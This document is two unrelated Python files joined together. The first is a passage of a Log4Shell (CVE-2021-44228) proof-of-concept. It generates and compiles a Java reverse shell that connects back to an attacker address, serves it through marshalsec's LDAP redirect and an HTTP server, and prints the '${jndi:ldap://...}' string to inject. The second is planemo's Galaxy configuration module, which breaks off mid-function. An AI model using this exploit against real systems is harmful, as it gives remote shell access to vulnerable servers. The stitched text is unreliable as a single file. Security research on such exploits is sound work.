from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def generate_payload(userip: str, lport: int) -> None:
    # Render the Java reverse-shell class (connects back to userip:lport)
    # into Exploit.java and compile it with the bundled javac.
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
    # writing the exploit to Exploit.java file
    p = Path("Exploit.java")
    try:
        p.write_text(program)
        # NOTE(review): os.path.join ignores CUR_FOLDER when the second
        # argument is absolute, so this resolves to the hard-coded javac path.
        subprocess.run([os.path.join(CUR_FOLDER, "/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/javac"), str(p)])
    except OSError as e:
        print(Fore.RED + f'[-] Something went wrong {e}')
        raise e
    else:
        print(Fore.GREEN + '[+] Exploit java class created success')
def payload(userip: str, webport: int, lport: int) -> None:
    # Generate/compile the Java payload, then serve it: the LDAP redirect
    # server runs on a background thread, the HTTP server in the foreground.
    generate_payload(userip, lport)
    print(Fore.GREEN + '[+] Setting up LDAP server\n')
    # create the LDAP server on new thread
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))
    t1.start()
    # start the web server
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()  # blocks until the process is interrupted
def check_java() -> bool:
    # Return True when the bundled JDK's `java -version` exits with 0
    # (both output streams are suppressed; only the exit code matters).
    exit_code = subprocess.call([
        os.path.join(CUR_FOLDER, '/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/java'),
        '-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    return exit_code == 0
def ldap_server(userip: str, lport: int) -> None:
    # Run marshalsec's JNDI LDAPRefServer, which redirects lookups to the
    # HTTP server hosting Exploit.class.
    # NOTE(review): the caller (payload) passes `webport` as this `lport`
    # argument; the value is used as the HTTP port in the redirect URL here,
    # not as the reverse-shell port.
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")
    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run([
        os.path.join(CUR_FOLDER, "/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/java"),
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])
def main() -> None:
    # CLI entry point: parse arguments, verify the bundled JDK runs, then
    # start the payload/LDAP/HTTP servers.
    init(autoreset=True)
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")
    parser = argparse.ArgumentParser(description='log4shell PoC')
    parser.add_argument('--userip',
                        metavar='userip',
                        type=str,
                        default='localhost',
                        help='Enter IP for LDAPRefServer & Shell')
    # argparse applies `type` to string defaults, so '8000'/'9001' become ints.
    parser.add_argument('--webport',
                        metavar='webport',
                        type=int,
                        default='8000',
                        help='listener port for HTTP port')
    parser.add_argument('--lport',
                        metavar='lport',
                        type=int,
                        default='9001',
                        help='Netcat Port')
    args = parser.parse_args()
    try:
        if not check_java():
            print(Fore.RED + '[-] Java is not installed inside the repository')
            raise SystemExit(1)
        payload(args.userip, args.webport, args.lport)
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        raise SystemExit(0)
if __name__ == "__main__":
main()
|
config.py | """Abstractions for setting up a Galaxy instance."""
from __future__ import absolute_import
from __future__ import print_function
import abc
import contextlib
import importlib.util
import os
import random
import shutil
import threading
from string import Template
from tempfile import mkdtemp
from galaxy.containers.docker_model import DockerVolume
from galaxy.tool_util.deps import docker_util
from galaxy.util.commands import argv_to_str
from packaging.version import parse as parse_version
from six import (
add_metaclass,
iteritems
)
from six.moves import shlex_quote
from planemo import git
from planemo.config import OptionSource
from planemo.deps import ensure_dependency_resolvers_conf_configured
from planemo.docker import docker_host_args
from planemo.galaxy.workflows import remote_runnable_to_workflow_id
from planemo.io import (
communicate,
kill_pid_file,
shell,
shell_join,
untar_to,
wait_on,
warn,
write_file,
)
from planemo.mulled import build_involucro_context
from planemo.shed import tool_shed_url
from planemo.virtualenv import DEFAULT_PYTHON_VERSION
from .api import (
DEFAULT_ADMIN_API_KEY,
gi,
user_api_key,
)
from .distro_tools import (
DISTRO_TOOLS_ID_TO_PATH
)
from .run import (
setup_common_startup_args,
setup_venv,
)
from .workflows import (
find_tool_ids,
import_workflow,
install_shed_repos,
)
NO_TEST_DATA_MESSAGE = (
"planemo couldn't find a target test-data directory, you should likely "
"create a test-data directory or pass an explicit path using --test_data."
)
WEB_SERVER_CONFIG_TEMPLATE = """
[server:${server_name}]
use = egg:Paste#http
port = ${port}
host = ${host}
use_threadpool = True
threadpool_kill_thread_limit = 10800
[app:main]
paste.app_factory = galaxy.web.buildapp:app_factory
static_dir = static/
"""
TOOL_CONF_TEMPLATE = """<toolbox>
<tool file="data_source/upload.xml" />
${tool_definition}
</toolbox>
"""
SHED_TOOL_CONF_TEMPLATE = """<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
"""
SHED_DATA_MANAGER_CONF_TEMPLATE = """<?xml version="1.0"?>
<data_managers>
</data_managers>
"""
EMPTY_JOB_METRICS_TEMPLATE = """<?xml version="1.0"?>
<job_metrics>
</job_metrics>
"""
TOOL_SHEDS_CONF = """<tool_sheds>
<tool_shed name="Target Shed" url="${shed_target_url}" />
</tool_sheds>
"""
JOB_CONFIG_LOCAL = """<job_conf>
<plugins>
<plugin id="planemo_runner" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations default="planemo_dest">
<destination id="planemo_dest" runner="planemo_runner">
<param id="require_container">${require_container}</param>
<param id="docker_enabled">${docker_enable}</param>
<param id="docker_sudo">${docker_sudo}</param>
<param id="docker_sudo_cmd">${docker_sudo_cmd}</param>
<param id="docker_cmd">${docker_cmd}</param>
${docker_host_param}
</destination>
<destination id="upload_dest" runner="planemo_runner">
<param id="docker_enabled">false</param>
</destination>
</destinations>
<tools>
<tool id="upload1" destination="upload_dest" />
</tools>
</job_conf>
"""
LOGGING_TEMPLATE = """
## Configure Python loggers.
[loggers]
keys = root,paste,urllib,displayapperrors,galaxydeps,galaxytoolsactions,galaxymasterapikey,galaxy
[handlers]
keys = console
[formatters]
keys = generic
[logger_root]
level = WARN
handlers = console
[logger_paste]
level = WARN
handlers = console
qualname = paste
propagate = 0
[logger_urllib]
level = WARN
handlers = console
qualname = urllib3
propagate = 0
[logger_galaxydeps]
level = DEBUG
handlers = console
qualname = galaxy.tools.deps
propagate = 0
[logger_galaxytoolsactions]
level = DEBUG
handlers = console
qualname = galaxy.tools.actions
propagate = 0
[logger_galaxymasterapikey]
level = WARN
handlers = console
qualname = galaxy.web.framework.webapp
propagate = 0
[logger_displayapperrors]
level = ERROR
handlers =
qualname = galaxy.datatypes.display_applications.application
propagate = 0
[logger_galaxy]
level = ${log_level}
handlers = console
qualname = galaxy
propagate = 0
[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = DEBUG
formatter = generic
[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s] %(message)s
"""
REFGENIE_CONFIG_TEMPLATE = """
config_version: %s
genome_folder: '%s'
genome_servers: ['http://refgenomes.databio.org']
genomes: null
"""
EMPTY_TOOL_CONF_TEMPLATE = """<toolbox></toolbox>"""
GX_TEST_TOOL_PATH = "$GALAXY_FUNCTIONAL_TEST_TOOLS"
DEFAULT_GALAXY_BRANCH = "master"
DEFAULT_GALAXY_SOURCE = "https://github.com/galaxyproject/galaxy"
CWL_GALAXY_SOURCE = "https://github.com/common-workflow-language/galaxy"
DATABASE_LOCATION_TEMPLATE = "sqlite:///%s?isolation_level=IMMEDIATE"
COMMAND_STARTUP_COMMAND = './scripts/common_startup.sh ${COMMON_STARTUP_ARGS}'
CLEANUP_IGNORE_ERRORS = True
DEFAULT_GALAXY_BRAND = 'Configured by Planemo'
DEFAULT_TOOL_INSTALL_TIMEOUT = 60 * 60 * 1
UNINITIALIZED = object()
@contextlib.contextmanager
def galaxy_config(ctx, runnables, **kwds):
    """Set up a ``GalaxyConfig`` in an auto-cleaned context.

    Dispatches to the local (default), Docker (``dockerize``), or external
    (``external``) implementation based on the supplied keyword options.
    """
    c = local_galaxy_config
    if kwds.get("dockerize", False):
        c = docker_galaxy_config
    elif kwds.get("external", False):
        c = external_galaxy_config
    log_thread = None
    try:
        with c(ctx, runnables, **kwds) as config:
            if kwds.get('daemon'):
                # Tail the daemonized server's log file in the background.
                log_thread = threading.Thread(target=read_log, args=(ctx, config.log_file))
                log_thread.daemon = True
                log_thread.start()
            yield config
    finally:
        if log_thread:
            # read_log loops indefinitely; the thread is daemonic, so just
            # wait up to a second for any final output before returning.
            log_thread.join(1)
def read_log(ctx, log_path):
    """Tail ``log_path``, echoing any new content through ``ctx.log``.

    Intended to run on a daemon thread (see ``galaxy_config``); the loop
    never terminates on its own and ends only with the interpreter.
    """
    log_fh = None
    e = threading.Event()
    try:
        # NOTE: an Event object is always truthy, so `while e:` loops
        # forever; e.wait(1) is used purely as a 1-second sleep.
        while e:
            if os.path.exists(log_path):
                if not log_fh:
                    # Open in append so we start at the end of the log file
                    log_fh = open(log_path, 'a+')
                log_lines = log_fh.read()
                if log_lines:
                    ctx.log(log_lines)
            e.wait(1)
    finally:
        if log_fh:
            log_fh.close()
def simple_docker_volume(path):
    """Return a read-write ``DockerVolume`` mounting *path* at itself."""
    abs_path = os.path.abspath(path)
    spec = "{0}:{0}:rw".format(abs_path)
    return DockerVolume(spec)
@contextlib.contextmanager
def docker_galaxy_config(ctx, runnables, for_tests=False, **kwds):
    """Set up a ``GalaxyConfig`` for Docker container."""
    test_data_dir = _find_test_data(runnables, **kwds)
    with _config_directory(ctx, **kwds) as config_directory:
        def config_join(*args):
            # All generated config files live under the (possibly temp)
            # config directory, which is bind-mounted into the container.
            return os.path.join(config_directory, *args)
        ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
        _handle_job_metrics(config_directory, kwds)
        galaxy_root = kwds.get('galaxy_root')
        _handle_refgenie_config(config_directory, galaxy_root, kwds)
        # Path inside the container image, not under config_directory.
        shed_tool_conf = "config/shed_tool_conf.xml"
        all_tool_paths = _all_tool_paths(runnables, galaxy_root, kwds.get('extra_tools'))
        tool_directories = set([])  # Things to mount...
        for tool_path in all_tool_paths:
            directory = os.path.dirname(os.path.normpath(tool_path))
            if os.path.exists(directory):
                tool_directories.add(directory)
        # TODO: remap these.
        tool_volumes = []
        for tool_directory in tool_directories:
            volume = simple_docker_volume(tool_directory)
            tool_volumes.append(volume)
        empty_tool_conf = config_join("empty_tool_conf.xml")
        tool_conf = config_join("tool_conf.xml")
        shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
        _ensure_directory(shed_tool_path)
        sheds_config_path = _configure_sheds_config_file(
            ctx, config_directory, **kwds
        )
        port = _get_port(kwds)
        properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
        _handle_container_resolution(ctx, kwds, properties)
        master_api_key = _get_master_api_key(kwds)
        # NOTE(review): this template_args dict is overwritten by the empty
        # template_args assignment below before it is ever used - confirm
        # whether shed_tool_path/tool_conf substitutions were intended here.
        template_args = dict(
            shed_tool_path=shed_tool_path,
            tool_conf=tool_conf,
        )
        tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
        _write_tool_conf(ctx, all_tool_paths, tool_conf)
        write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
        properties.update(dict(
            tool_config_file=tool_config_file,
            tool_sheds_config_file=sheds_config_path,
            migrated_tools_config=empty_tool_conf,
        ))
        server_name = "planemo%d" % random.randint(0, 100000)
        # Value substitutions in Galaxy properties - for consistency with
        # non-Dockerized version.
        template_args = dict(
        )
        env = _build_env_for_galaxy(properties, template_args)
        env["NONUSE"] = "nodejs,proftp,reports"
        if ctx.verbose:
            env["GALAXY_LOGGING"] = "full"
        # TODO: setup FTP upload dir and disable FTP server in container.
        _build_test_env(properties, env)
        docker_target_kwds = docker_host_args(**kwds)
        volumes = tool_volumes + [simple_docker_volume(config_directory)]
        export_directory = kwds.get("export_directory", None)
        if export_directory is not None:
            volumes.append(DockerVolume("%s:/export:rw" % export_directory))
        # TODO: Allow this to real Docker volumes and allow multiple.
        extra_volume = kwds.get("docker_extra_volume")
        if extra_volume:
            volumes.append(simple_docker_volume(extra_volume))
        yield DockerGalaxyConfig(
            ctx,
            config_directory,
            env,
            test_data_dir,
            port,
            server_name,
            master_api_key,
            runnables,
            docker_target_kwds=docker_target_kwds,
            volumes=volumes,
            export_directory=export_directory,
            kwds=kwds,
        )
@contextlib.contextmanager
def local_galaxy_config(ctx, runnables, for_tests=False, **kwds):
    """Set up a ``GalaxyConfig`` in an auto-cleaned context."""
    test_data_dir = _find_test_data(runnables, **kwds)
    tool_data_table = _find_tool_data_table(
        runnables,
        test_data_dir=test_data_dir,
        **kwds
    )
    data_manager_config_paths = [r.data_manager_conf_path for r in runnables if r.data_manager_conf_path]
    galaxy_root = _find_galaxy_root(ctx, **kwds)
    install_galaxy = kwds.get("install_galaxy", False)
    if galaxy_root is not None:
        # An empty directory can simply be reclaimed; a non-empty one must
        # not be clobbered by a fresh install.
        if os.path.isdir(galaxy_root) and not os.listdir(galaxy_root):
            os.rmdir(galaxy_root)
        if os.path.isdir(galaxy_root) and install_galaxy:
            raise Exception("%s is an existing non-empty directory, cannot install Galaxy again" % galaxy_root)
    # Duplicate block in docker variant above.
    if kwds.get("mulled_containers", False):
        if not kwds.get("docker", False):
            if ctx.get_option_source("docker") != OptionSource.cli:
                kwds["docker"] = True
            else:
                raise Exception("Specified no docker and mulled containers together.")
        conda_default_options = ('conda_auto_init', 'conda_auto_install')
        use_conda_options = ('dependency_resolution', 'conda_use_local', 'conda_prefix', 'conda_exec')
        if not any(kwds.get(_) for _ in use_conda_options) and all(ctx.get_option_source(_) == OptionSource.default for _ in conda_default_options):
            # If using mulled_containers and default conda options disable conda resolution
            kwds['no_dependency_resolution'] = kwds['no_conda_auto_init'] = True
    with _config_directory(ctx, **kwds) as config_directory:
        def config_join(*args):
            return os.path.join(config_directory, *args)
        install_env = {}
        if kwds.get('galaxy_skip_client_build', True):
            install_env['GALAXY_SKIP_CLIENT_BUILD'] = '1'
        if galaxy_root is None:
            galaxy_root = config_join("galaxy-dev")
        if not os.path.isdir(galaxy_root):
            _install_galaxy(ctx, galaxy_root, install_env, kwds)
        if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
            # on python 3 we use gunicorn,
            # which requires 'main' as server name
            server_name = 'main'
        else:
            server_name = "planemo%d" % random.randint(0, 100000)
        # Once we don't have to support earlier than 18.01 - try putting these files
        # somewhere better than with Galaxy.
        log_file = "%s.log" % server_name
        pid_file = "%s.pid" % server_name
        ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
        _handle_job_config_file(config_directory, server_name, kwds)
        _handle_job_metrics(config_directory, kwds)
        _handle_refgenie_config(config_directory, galaxy_root, kwds)
        file_path = kwds.get("file_path") or config_join("files")
        _ensure_directory(file_path)
        tool_dependency_dir = kwds.get("tool_dependency_dir") or config_join("deps")
        _ensure_directory(tool_dependency_dir)
        shed_tool_conf = kwds.get("shed_tool_conf") or config_join("shed_tools_conf.xml")
        all_tool_paths = _all_tool_paths(runnables, galaxy_root=galaxy_root, extra_tools=kwds.get('extra_tools'))
        empty_tool_conf = config_join("empty_tool_conf.xml")
        tool_conf = config_join("tool_conf.xml")
        shed_data_manager_config_file = config_join("shed_data_manager_conf.xml")
        shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
        _ensure_directory(shed_tool_path)
        sheds_config_path = _configure_sheds_config_file(
            ctx, config_directory, **kwds
        )
        database_location = config_join("galaxy.sqlite")
        master_api_key = _get_master_api_key(kwds)
        dependency_dir = os.path.join(config_directory, "deps")
        # NOTE(review): shed_tool_path was already ensured above - this
        # second _ensure_directory call is redundant (harmless).
        _ensure_directory(shed_tool_path)
        port = _get_port(kwds)
        # Substitutions applied to the ${...} placeholders in the various
        # config templates (galaxy.ini, logging.ini, shed tool conf).
        template_args = dict(
            port=port,
            host=kwds.get("host", "127.0.0.1"),
            server_name=server_name,
            temp_directory=config_directory,
            shed_tool_path=shed_tool_path,
            database_location=database_location,
            tool_conf=tool_conf,
            debug=kwds.get("debug", "true"),
            id_secret=kwds.get("id_secret", "test_secret"),
            log_level="DEBUG" if ctx.verbose else "INFO",
        )
        tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
        # Setup both galaxy_email and older test user test@bx.psu.edu
        # as admins for command_line, etc...
        properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
        properties.update(dict(
            server_name="main",
            ftp_upload_dir_template="${ftp_upload_dir}",
            ftp_upload_purge="False",
            ftp_upload_dir=test_data_dir or os.path.abspath('.'),
            ftp_upload_site="Test Data",
            check_upload_content="False",
            tool_dependency_dir=dependency_dir,
            file_path=file_path,
            new_file_path="${temp_directory}/tmp",
            tool_config_file=tool_config_file,
            tool_sheds_config_file=sheds_config_path,
            manage_dependency_relationships="False",
            job_working_directory="${temp_directory}/job_working_directory",
            template_cache_path="${temp_directory}/compiled_templates",
            citation_cache_type="file",
            citation_cache_data_dir="${temp_directory}/citations/data",
            citation_cache_lock_dir="${temp_directory}/citations/lock",
            database_auto_migrate="True",
            enable_beta_tool_formats="True",
            id_secret="${id_secret}",
            log_level="${log_level}",
            debug="${debug}",
            watch_tools="auto",
            default_job_shell="/bin/bash",  # For conda dependency resolution
            tool_data_table_config_path=tool_data_table,
            data_manager_config_file=",".join(data_manager_config_paths) or None,  # without 'or None' may raise IOError in galaxy (see #946)
            integrated_tool_panel_config=("${temp_directory}/"
                                          "integrated_tool_panel_conf.xml"),
            migrated_tools_config=empty_tool_conf,
            test_data_dir=test_data_dir,  # TODO: make gx respect this
            shed_data_manager_config_file=shed_data_manager_config_file,
        ))
        _handle_container_resolution(ctx, kwds, properties)
        write_file(config_join("logging.ini"), _sub(LOGGING_TEMPLATE, template_args))
        properties["database_connection"] = _database_connection(database_location, **kwds)
        _handle_kwd_overrides(properties, kwds)
        # TODO: consider following property
        # watch_tool = False
        # datatypes_config_file = config/datatypes_conf.xml
        # welcome_url = /static/welcome.html
        # logo_url = /
        # sanitize_all_html = True
        # serve_xss_vulnerable_mimetypes = False
        # track_jobs_in_database = None
        # outputs_to_working_directory = False
        # retry_job_output_collection = 0
        env = _build_env_for_galaxy(properties, template_args)
        env.update(install_env)
        _build_test_env(properties, env)
        env['GALAXY_TEST_SHED_TOOL_CONF'] = shed_tool_conf
        env['GALAXY_TEST_DBURI'] = properties["database_connection"]
        env["GALAXY_TEST_UPLOAD_ASYNC"] = "false"
        env["GALAXY_TEST_LOGGING_CONFIG"] = config_join("logging.ini")
        env["GALAXY_DEVELOPMENT_ENVIRONMENT"] = "1"
        # disable all access log messages from uvicorn
        env["GALAXY_TEST_DISABLE_ACCESS_LOG"] = "False"
        # Following are needed in 18.01 to prevent Galaxy from changing log and pid.
        # https://github.com/galaxyproject/planemo/issues/788
        env["GALAXY_LOG"] = log_file
        env["GALAXY_PID"] = pid_file
        web_config = _sub(WEB_SERVER_CONFIG_TEMPLATE, template_args)
        write_file(config_join("galaxy.ini"), web_config)
        _write_tool_conf(ctx, all_tool_paths, tool_conf)
        write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
        shed_tool_conf_contents = _sub(SHED_TOOL_CONF_TEMPLATE, template_args)
        # Write a new shed_tool_conf.xml if needed.
        write_file(shed_tool_conf, shed_tool_conf_contents, force=False)
        write_file(shed_data_manager_config_file, SHED_DATA_MANAGER_CONF_TEMPLATE)
        yield LocalGalaxyConfig(
            ctx,
            config_directory,
            env,
            test_data_dir,
            port,
            server_name,
            master_api_key,
            runnables,
            galaxy_root,
            kwds,
        )
def _expand_paths(galaxy_root, extra_tools):
"""Replace $GALAXY_FUNCTION_TEST_TOOLS with actual path."""
if galaxy_root:
extra_tools = [path if path != GX_TEST_TOOL_PATH else os.path.join(galaxy_root, 'test/functional/tools') for path in extra_tools]
return extra_tools
def get_galaxy_major_version(galaxy_root):
    # Load lib/galaxy/version.py straight from the source tree (without
    # importing the full galaxy package) and parse its VERSION_MAJOR.
    spec = importlib.util.spec_from_file_location('__galaxy_version', os.path.join(galaxy_root, 'lib', 'galaxy', 'version.py'))
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return parse_version(module.VERSION_MAJOR)
def get_refgenie_config(galaxy_root, refgenie_dir):
    """Render a refgenie configuration matching the target Galaxy version."""
    # Galaxy releases before 21.09 expect the older 0.3 config schema; when
    # no galaxy_root is available, assume the current schema.
    needs_old_schema = (
        galaxy_root
        and get_galaxy_major_version(galaxy_root=galaxy_root) < parse_version('21.09')
    )
    config_version = 0.3 if needs_old_schema else 0.4
    return REFGENIE_CONFIG_TEMPLATE % (config_version, refgenie_dir)
def _all_tool_paths(runnables, galaxy_root=None, extra_tools=None):
    """Collect every tool path required to execute ``runnables``.

    Includes tool runnables themselves, any expanded ``extra_tools``
    entries, and distro tool paths referenced by workflow runnables.
    """
    paths = [r.path for r in runnables if r.has_tools and not r.data_manager_conf_path]
    paths.extend(_expand_paths(galaxy_root, extra_tools=extra_tools or []))
    for runnable in runnables:
        if runnable.type.name != "galaxy_workflow":
            continue
        for tool_id in find_tool_ids(runnable.path):
            distro_paths = DISTRO_TOOLS_ID_TO_PATH.get(tool_id)
            if not distro_paths:
                continue
            # A single path may be recorded as a bare string.
            if isinstance(distro_paths, str):
                distro_paths = [distro_paths]
            paths.extend(distro_paths)
    return paths
def _shared_galaxy_properties(config_directory, kwds, for_tests):
    """Setup properties useful for local and Docker Galaxy instances.

    Most things related to paths, etc... are very different between Galaxy
    modalities and many taken care of internally to the container in that
    mode. But this method sets up API stuff, tool, and job stuff that can
    be shared.
    """
    user_email = _user_email(kwds)
    properties = {
        'master_api_key': _get_master_api_key(kwds),
        'admin_users': "%s,test@bx.psu.edu" % user_email,
        'expose_dataset_path': "True",
        'cleanup_job': 'never',
        'collect_outputs_from': "job_working_directory",
        'allow_path_paste': "True",
        'check_migrate_tools': "False",
        'use_cached_dependency_manager': str(kwds.get("conda_auto_install", False)),
        'brand': kwds.get("galaxy_brand", DEFAULT_GALAXY_BRAND),
        'strict_cwl_validation': str(not kwds.get("non_strict_cwl", False)),
    }
    if kwds.get("galaxy_single_user", True):
        properties['single_user'] = user_email
    if for_tests:
        # Point plugin directories at an empty dir so tests don't pick up
        # ambient tours/visualizations/IE plugins.
        empty_dir = os.path.join(config_directory, "empty")
        _ensure_directory(empty_dir)
        for plugin_key in (
            "tour_config_dir",
            "interactive_environment_plugins_directory",
            "visualization_plugins_directory",
        ):
            properties[plugin_key] = empty_dir
    properties["refgenie_config_file"] = kwds.get('refgenie_config_file', '')
    return properties
@contextlib.contextmanager
def external_galaxy_config(ctx, runnables, for_tests=False, **kwds):
    """Yield a ``BaseGalaxyConfig`` pointing at an externally managed Galaxy."""
    config = BaseGalaxyConfig(
        ctx=ctx,
        galaxy_url=kwds.get("galaxy_url", None),
        master_api_key=_get_master_api_key(kwds),
        user_api_key=kwds.get("galaxy_user_key", None),
        runnables=runnables,
        kwds=kwds,
    )
    yield config
def _get_master_api_key(kwds):
master_api_key = kwds.get("galaxy_admin_key") or DEFAULT_ADMIN_API_KEY
return master_api_key
def _get_port(kwds):
port = int(kwds.get("port", 9090))
return port
def _user_email(kwds):
user_email = kwds.get("galaxy_email")
return user_email
@contextlib.contextmanager
def _config_directory(ctx, **kwds):
config_directory = kwds.get("config_directory", None)
created_config_directory = False
if not config_directory:
created_config_directory = True
config_directory = os.path.realpath(mkdtemp())
ctx.vlog("Created directory for Galaxy configuration [%s]" % config_directory)
try:
yield config_directory
finally:
cleanup = not kwds.get("no_cleanup", False)
if created_config_directory and cleanup:
shutil.rmtree(config_directory)
@add_metaclass(abc.ABCMeta)
class GalaxyInterface(object):
    """Abstraction around a Galaxy instance.

    Description of a Galaxy instance and how to interact with it - this could
    potentially be a remote, already running instance or an instance Planemo manages
    to execute some task(s).
    """
    @abc.abstractproperty
    def gi(self):
        """Return an admin bioblend Galaxy instance for API interactions."""
    @abc.abstractproperty
    def user_gi(self):
        """Return a user-backed bioblend Galaxy instance for API interactions."""
    @abc.abstractmethod
    def install_repo(self, *args, **kwds):
        """Install specified tool shed repository."""
    @abc.abstractproperty
    def tool_shed_client(self):
        """Return a admin bioblend tool shed client."""
    @abc.abstractmethod
    def wait_for_all_installed(self):
        """Wait for all queued up repositories installs to complete."""
    @abc.abstractmethod
    def install_workflows(self):
        """Install all workflows configured with these planemo arguments."""
    @abc.abstractmethod
    def workflow_id(self, path):
        """Get installed workflow API ID for input path."""
    @abc.abstractproperty
    def version_major(self):
        """Return target Galaxy version."""
    @abc.abstractproperty
    def user_api_config(self):
        """Return the API indicated configuration for user session.

        Calling .config.get_config() with admin GI session would yield
        a different object (admins have different view of Galaxy's
        configuration).
        """
    @property
    def user_is_admin(self):
        # Derived from the user-session config rather than declared abstract:
        # the API reports whether the session's key belongs to an admin.
        return self.user_api_config["is_admin_user"]
@add_metaclass(abc.ABCMeta)
class GalaxyConfig(GalaxyInterface):
    """Specialization of GalaxyInterface for Galaxy instances Planemo manages itself.

    This assumes more than an API connection is available - Planemo needs to be able to
    start and stop the Galaxy instance, recover logs, etc... There are currently two
    implementations - a locally executed Galaxy and one running inside a Docker container.
    """
    @abc.abstractproperty
    def kill(self):
        """Stop the running instance."""
    @abc.abstractmethod
    def startup_command(self, ctx, **kwds):
        """Return a shell command used to startup this instance.

        Among other common planemo kwds, this should respect the
        ``daemon`` keyword.
        """
    @abc.abstractproperty
    def log_contents(self):
        """Retrieve text of log for running Galaxy instance."""
    @abc.abstractmethod
    def cleanup(self):
        """Cleanup allocated resources to run this instance."""
    @abc.abstractproperty
    def use_path_paste(self):
        """Use path paste to upload data.

        This will only be an option if the target user key is an
        admin user key.
        """
class BaseGalaxyConfig(GalaxyInterface):
    """Config for a Galaxy instance reached purely through its HTTP API.

    Holds the URL and API keys plus per-run bookkeeping (installed repos,
    imported workflow IDs); subclasses add process management.
    """
    def __init__(
        self,
        ctx,
        galaxy_url,
        master_api_key,
        user_api_key,
        runnables,
        kwds,
    ):
        self._ctx = ctx
        self.galaxy_url = galaxy_url
        self.master_api_key = master_api_key
        self._user_api_key = user_api_key
        self.runnables = runnables
        self._kwds = kwds
        self._workflow_ids = {}
        self.installed_repos = {}
        self.updated_repos = {}
        # UNINITIALIZED sentinel allows None to be a legitimate cached value.
        self._target_version = UNINITIALIZED
        self._target_user_config = UNINITIALIZED
    @property
    def gi(self):
        """Admin bioblend Galaxy instance (master API key)."""
        assert self.galaxy_url
        return gi(url=self.galaxy_url, key=self.master_api_key)
    @property
    def user_gi(self):
        """User-backed bioblend Galaxy instance (user API key)."""
        user_api_key = self.user_api_key
        assert user_api_key
        return self._gi_for_key(user_api_key)
    @property
    def user_api_key(self):
        # TODO: thread-safe
        if self._user_api_key is None:
            # Lazily obtain a user key via the module-level user_api_key()
            # helper using the admin connection.
            # TODO: respect --galaxy_email - seems like a real bug
            self._user_api_key = user_api_key(self.gi)
        return self._user_api_key
    def _gi_for_key(self, key):
        # Build a bioblend connection to this instance for an arbitrary key.
        assert self.galaxy_url
        return gi(url=self.galaxy_url, key=key)
    def install_repo(self, *args, **kwds):
        """Install specified tool shed repository."""
        self.tool_shed_client.install_repository_revision(
            *args, **kwds
        )
    @property
    def tool_shed_client(self):
        """Admin bioblend tool shed client."""
        return self.gi.toolShed
    def wait_for_all_installed(self):
        """Wait for all queued up repositories installs to complete."""
        def status_ready(repo):
            # None -> still in progress, True -> done, raise -> failed.
            status = repo["status"]
            if status in ["Installing", "New"]:
                return None
            if status == "Installed":
                return True
            raise Exception("Error installing repo status is %s" % status)
        def ready():
            repos = self.tool_shed_client.get_repositories()
            ready = all(map(status_ready, repos))
            return ready or None
        wait_on(ready, "galaxy tool installation", timeout=DEFAULT_TOOL_INSTALL_TIMEOUT)
    def install_workflows(self):
        """Import every local (non-remote) workflow runnable."""
        for runnable in self.runnables:
            if runnable.type.name in ["galaxy_workflow", "cwl_workflow"] and not runnable.is_remote_workflow_uri:
                self._install_workflow(runnable)
    def _install_workflow(self, runnable):
        # Optionally install the shed repositories the workflow's tools need
        # first; requires an admin key when targeting an external Galaxy.
        if self._kwds.get("shed_install") and (self._kwds.get("engine") != "external_galaxy" or self._kwds.get("galaxy_admin_key")):
            workflow_repos = install_shed_repos(runnable,
                                                self.gi,
                                                self._kwds.get("ignore_dependency_problems", False),
                                                self._kwds.get("install_tool_dependencies", False),
                                                self._kwds.get("install_resolver_dependencies", True),
